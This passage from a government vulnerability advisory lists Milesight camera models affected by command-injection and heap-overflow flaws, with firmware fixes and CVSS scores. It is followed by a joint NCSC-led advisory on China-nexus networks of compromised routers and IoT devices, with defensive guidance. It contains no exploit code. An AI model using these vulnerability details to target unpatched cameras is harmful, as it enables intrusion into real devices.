TS8266-X4PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS2966-X12TVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RWE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4WE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix MS-C2964-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2972-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-RFLWPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TGPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC/W: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2867-X5TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2961-X12TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS8266-FPC/P: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5361-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-Cxx66-xxxxGOPC : 45.8.0.2-AIoT-r4 and prior versions: Update to 45.8.0.2-AIoT-r5 Vendor fix SC211: C_21.1.0.8-r4 and prior versions: Update to C_21.1.0.8-r5 Vendor fix SP111: 52.8.0.4-r5 and prior versions: Update to 52.8.0.4-r6 Vendor fix MS-Cxx66-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx66-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Mitigation Milesight asks all users to report potential security vulnerabilities to security@milesight.com. mailto:security@milesight.com Mitigation Learn more: Milesight Vulnerability Reporting Policy https://www.milesight.com/legal/vulnerability-report Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H CVE-2026-20766 An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras. View CVE Details Affected Products Milesight Cameras Vendor: Milesight Product Version: Milesight MS-Cxx63-PD: <=51.7.0.77-r12, Milesight MS-Cxx64-xPD: <=51.7.0.77-r12, Milesight MS-Cxx73-xPD: <=51.7.0.77-r12, Milesight MS-Cxx75-xxPD: <=51.7.0.77-r12, Milesight MS-Cxx83-xPD: <=51.7.0.77-r12, Milesight MS-Cxx74-PA: <=3x.8.0.3-r11, Milesight MS-C8477-HPG1: <=63.8.0.4-r3, Milesight MS-C8477-PC: <=48.8.0.4-r3, Milesight MS-C5321-FPE: <=62.8.0.4-r5, Milesight MS-Cxx72-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx62-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx52-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxGPE: <=61.8.0.5-r2, Milesight MS-Cxx61-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx67-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx71-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx41-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx76-PE: <=61.8.0.5-r2, Milesight MS-Cxx65-PE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx62-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx72-xxxG1: <=63.8.0.5-r3, Milesight MS-CQxx31-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx68-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx72-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-Nxxxx-NxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxC: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxG: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxH: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxT: <=7x.9.0.19-r5, Milesight PMC8266-FPE: <=PO_61.8.0.4_LPR, Milesight PMC8266-FGPE: <=PO_61.8.0.4_LPR, Milesight PM3322-E: <=PI_61.8.0.3_LPR-r3, Milesight TS4466-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS5366-X12RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS5510-GVH: <=T_47.8.0.4_LPR-r7, Milesight TS5510-GH: <=T_47.8.0.4_LPR-r6, Milesight TS5511-GVH: <=T_47.8.0.4_LPR-r6, Milesight TS2966-X12TPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12PE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4PE: <=T_61.8.0.4_LPR-r3, Milesight TS2966-X12TVPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RVPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12VPE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4VPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RWE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4WE: <=T_61.8.0.4_LPR-r3, Milesight MS-C2964-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2972-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-RFLWPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TVPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TGPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC/W: <=T_45.8.0.3-r9, Milesight TS2867-X5TPC: <=T_45.8.0.3-r9, Milesight TS2961-X12TPC: <=T_45.8.0.3-r9, Milesight TS8266-FPC/P: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLVPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LVPC: <=T_45.8.0.3-r9, Milesight MS-C5361-X12LPC: <=T_45.8.0.3-r9, Milesight MS-Cxx66-xxxxGOPC: <=45.8.0.2-AIoT-r4, Milesight SC211: <=C_21.1.0.8-r4, Milesight SP111: <=52.8.0.4-r5, Milesight MS-Cxx66-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx66-FIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-FIPKG1: <=63.8.0.4-r1-NX Product Status: known_affected Remediations Mitigation Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware.  https://www.milesight.com/support/download/firmware Vendor fix MS-Cxx63-PD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx64-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx73-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx75-xxPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx83-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx74-PA: 3x.8.0.3-r11 and prior versions: Update to 3x.8.0.3-r13 Vendor fix MS-C8477-HPG1: 63.8.0.4-r3 and prior versions: Update to 63.8.0.4-r4 Vendor fix MS-C8477-PC: 48.8.0.4-r3 and prior versions: Update to 48.8.0.4-r4 Vendor fix MS-C5321-FPE: 62.8.0.4-r5 and prior versions: Update to 62.8.0.4-r6 Vendor fix MS-Cxx72-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx62-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx52-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxGPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx61-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx67-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx71-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx41-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx76-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx65-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx62-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx72-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-CQxx31-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx68-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx72-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-Nxxxx-NxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxC: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxG: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxH: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxT: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix PMC8266-FPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PMC8266-FGPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PM3322-E: PI_61.8.0.3_LPR-r3 and prior versions: Update to PI_61.8.0.3-r5 Vendor fix TS4466-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5366-X12RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5510-GVH: T_47.8.0.4_LPR-r7 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS5510-GH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS5511-GVH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS2966-X12TPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS2966-X12TVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RWE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4WE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix MS-C2964-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2972-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-RFLWPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TGPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC/W: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2867-X5TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2961-X12TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS8266-FPC/P: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5361-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-Cxx66-xxxxGOPC: 45.8.0.2-AIoT-r4 and prior versions: Update to 45.8.0.2-AIoT-r5 Vendor fix SC211: C_21.1.0.8-r4 and prior versions: Update to C_21.1.0.8-r5 Vendor fix SP111: 52.8.0.4-r5 and prior versions: Update to 52.8.0.4-r6 Vendor fix MS-Cxx66-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx66-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Mitigation Milesight asks all users to report potential security vulnerabilities to security@milesight.com. mailto:security@milesight.com Mitigation Learn more: Milesight Vulnerability Reporting Policy https://www.milesight.com/legal/vulnerability-report Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Acknowledgments Souvik Kandar reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-23 Date Revision Summary 2026-04-23 1 Initial Publication Legal Notice and Terms of Use

Defending against china-nexus covert networks of compromised devices executive summary Defending against China-nexus covert networks of compromised devices  Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it  Summary With support from the UK Cyber League, this advisory has been jointly released by the National Cyber Security Centre (NCSC-UK) and international partners:  Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC) Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre) Germany Federal Office for the Protection of the Constitution -   Bundesamt für Verfassungsschutz (BfV) Germany Federal Intelligence Service – Bundesnachrichtendienst (BND) Germany Federal Office for Information Security - Bundesamt für Sicherheit in der Informationstechnik (BSI) Japan National Cybersecurity Office (NCO) - 国家サイバー統括室 Netherlands General Intelligence and Security Service - Algemene Inlichtingen- en Veiligheidsdienst (AIVD) Netherlands Defence Intelligence and Security Service - Militaire Inlichtingen- en Veiligheidsdienst (MIVD) New Zealand National Cyber Security Centre (NCSC-NZ) Spain National Cryptologic Centre – Centro Criptológico Nacional (CCN) Sweden National Cyber Security Centre - Nationellt cybersäkerhetscenter (NCSC-SE) United States Cybersecurity and Infrastructure Security Agency (CISA) United States Department of Defense Cyber Crime Center (DC3) United States Federal Bureau of Investigation (FBI) United States National Security Agency (NSA)  Its purpose is to provide network defenders with the tools needed to defend against China-nexus cyber actors and their tactic of using large scale networks of compromised devices (covert networks) to route their cyber activity.  Introduction   Over the past few years there has been a major shift in the tactics, techniques and procedures (TTPs) used by China-nexus cyber actors, moving away from the use of individually procured infrastructure, and towards the use of externally provisioned, large-scale networks of compromised devices.  The NCSC believes that the majority of China-nexus threat actors are using these networks (hereafter “covert networks”), that multiple covert networks have been created and are being constantly updated, and that a single covert network could be being used by multiple actors. These networks are mainly made up of compromised Small Office Home Office (SOHO) routers, as well as Internet of Things (IoT) and smart devices.  Anyone who is a target of China-nexus cyber actors may be impacted by the use of covert networks. They have been used by Chinese state-sponsored actors Volt Typhoon to pre-position offensive cyber capabilities on critical national infrastructure. The group Flax Typhoon used a different covert network of compromised infrastructure to conduct cyber espionage.  The use of covert networks of compromised devices - also known as botnets - to facilitate malicious cyber activity is not new, but China-nexus cyber actors are now using them strategically, and at scale.   This advisory describes the typical makeup of a covert network and what they are being used for. It also includes protective advice for organizations being targeted by cyber activity using a covert network as an access vector. Covert Networks  Covert networks are used to connect across the internet in a low-cost, low-risk, deniable way, disguising the origin and attribution of malicious activity. Actors have been observed using them for each phase of their Cyber Kill Chains, from performing scans as part of reconnaissance, to the delivery of malware, communicating with said malware, and exfiltrating stolen data from a victim. They can also be used for general deniable internet browsing, allowing threat actors to research exploitation techniques, new TTPs, and their victims without attribution. Some covert networks are also used by legitimate customers to browse the internet, making it challenging to attribute malicious activity.  There is evidence that covert networks used by China-nexus actors are created and maintained by Chinese information security companies. A network known to network defenders as Raptor Train, which in 2024 infected more than 200,000 devices worldwide, was controlled and managed by the Chinese company, Integrity Technology Group. This company was also assessed by the FBI to be responsible for the computer intrusion activities attributed to China-based hackers known as Flax Typhoon.  Botnet operations represent a significant threat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyber attacks – NCSC Director of Operations, Paul Chichester  Covert networks mostly consist of compromised SOHO routers, but they also pull in any vulnerable device they can exploit at scale. Raptor Train was made up of thousands of SOHO routers and IoT devices, such as web cameras and video recorders, as well as firewalls and Network Attached Storage (NAS) devices. The KV Botnet used by Volt Typhoon was mainly made up of vulnerable Cisco and NetGear routers. The edge devices were vulnerable because they were “end of life” – out of date and no longer receiving updates or security patches by their manufacturers.  The cyber security industry has been aware of examples of these networks for some time and has publicly reported on the widespread scale of the threat and its implications. Mandiant Intelligence produced a public blog in May 2024 talking about covert networks in which they highlighted a key issue for defenders – indicator of compromise (IOC) Extinction. If a particular threat group could now come from one of many covert networks, each with potentially hundreds of thousands of endpoints, and each used by multiple threat actors, old network defense paradigms of static malicious IP block lists will be less effective. This is compounded by the dynamic nature of these networks where new nodes will be added as old devices are patched or removed from use.  Typical Network Topology The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed. The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network.  Because of this, a description of all known covert networks in detail, including how they are constructed and how they communicate, would immediately be out of date – and for most network defenders would not be practically useful.  However, most covert networks of compromised devices use the same basic set up. Understanding this generalized structure can aid researchers and defenders by helping them to understand which part of a network they may have found, and how to defend against it.  A diagram illustrating the basic setup of a covert network. The diagram above illustrates the basic setup of a covert network, where typically an actor will connect to the network via an on-ramp or entry node. Their traffic will be forwarded through multiple compromised devices, used as traversal nodes, before exiting the network from an exit node, usually in the same geographic region as the target.  Protective Advice  Defending from attackers using covert networks is not straightforward, and defensive tactics will be different based on the levels of resource and the nature of the target organization. General advice for good cyber security practice should be followed, and some key messages can be found in the appendix of this advisory.   The following advice is specifically tailored to steps which can be taken to combat the risk of attacks coming from large, dynamic networks of compromised devices.  Further guidance for all organizations facing cyber security threats is available on the NCSC website.  This guidance should be considered alongside all applicable laws and regulations of the UK and co-sealing countries relating to the security of networks and data. It will be each organization’s responsibility to ensure compliance with any such laws and regulations. Organizations should note that following the recommended actions set out below will not remove all risks. All organizations The NCSC recommends the following steps for all affected organizations to either take themselves, or ask their managed service and/or security providers to investigate for them:  Map and understand network edge devices, developing a clear understanding of organizational assets and what should be connecting to them. Baseline normal connections, especially to corporate virtual private networks (VPNs) or other similar services. Would you expect connections from consumer broadband ranges? Leverage available dynamic threat feeds which include covert network infrastructure. Implement multifactor authentication for remote connections. Smaller organizations should consider creating and actioning a free NCSC Cyber Action Toolkit.  Larger or more at-risk organizations Some more comprehensive measures may be appropriate if the risk to an organization is high enough, to be conducted either in-house or through a security provider:   Apply IP address allow lists rather than deny lists for connections to corporate VPNs for remote workers. Use geographic allow lists or profile incoming connections based on operating system, time zones, and/or organization specific system configuration settings. Implement zero trust policies for connections. Enforce machine certificates for Secure Sockets Layer (SSL) connections. Reduce the internet-facing presence of the IT estate. Investigate machine learning techniques to profile normal network edge activity to detect and block anomalies.  The NCSC's Cyber Essentials can help protect organizations of all sizes.  Largest or most at-risk organizations  If Advanced Persistent Threat (APT) tracking is part of an organization’s in-house capability, or if it is part of the service provided by a security vendor, consider tracking China-nexus covert networks as APTs in their own right. Active hunting – look for connections from IP addresses likely to be part of a covert network of compromised devices, for instance those hosting SOHO routers or IoT devices. Track and map covert networks reported by industry or government by looking at banners and certificates. Use threat reporting and threat feeds to create and implement dynamic blocklists and create alert rules to detect incoming threats. Consider using NetFlow feeds to look upstream and map covert networks to find new nodes.  The NCSC Cyber Assessment Framework provides guidance for organizations under the highest levels of threat, including those operating essential services, in sectors such as energy, healthcare, transport, digital infrastructure and government.   MITRE ATT&CK®  This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.  Tactic  ID  Technique  Procedure  Resource Development  T1584.005  Compromise Infrastructure: Botnet  Botnets are used as core components of covert networks  Resource Development  T1584.008  Compromise Infrastructure: Network Devices  Devices are compromised and added to botnets  Resource Development  T1583.003  Acquire Infrastructure: Virtual Private Server  Virtual private servers (VPS) are used in covert networks, typically as on-ramps  Command and Control  T1090.003  Proxy: Multi-hop Proxy  Used by China-nexus cyber actors to route traffic   Appendix: Cyber Security Best Practices  In addition to the protective advice outlined in this advisory, a number of cyber security best practices will also be useful in defending against the activity described in this advisory.  Protect your devices and networks by keeping them up to date: use the latest supported versions, apply security updates promptly, use antivirus and scan regularly to guard against known malware threats. See NCSC Guidance: https://www.ncsc.gov.uk/collection/device-security-guidance/policies-and-settings/antivirus-and-other-security-software Prevent and detect lateral movement in your organization’s networks. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement Implement architectural controls for network segregation. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/10-steps-network-security Set up a security monitoring capability so you are collecting the data that will be needed to analyze network intrusions. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes and https://www.ncsc.gov.uk/information/logging-made-easy Use modern systems and software. These have better security built-in. If you cannot move off out-of-date platforms and applications straight away, there are short term steps you can take to improve your position. See NCSC Guidance:  https://www.ncsc.gov.uk/collection/mobile-device-guidance/managing-the-risks-from-obsolete-products Restrict intruders' ability to move freely around your systems and networks. Pay particular attention to potentially vulnerable entry points such as third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement and https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security. Deploy a host-based intrusion detection system. A variety of products are available, free and paid-for, to suit different needs and budgets. Further information: Invest in preventing malware-based attacks across various scenarios.  See NCSC Guidance: https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks  Disclaimer   This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by co-sealers. UK readers should refer to the NCSC website for information about NCSC assured services.  This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.   Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk.   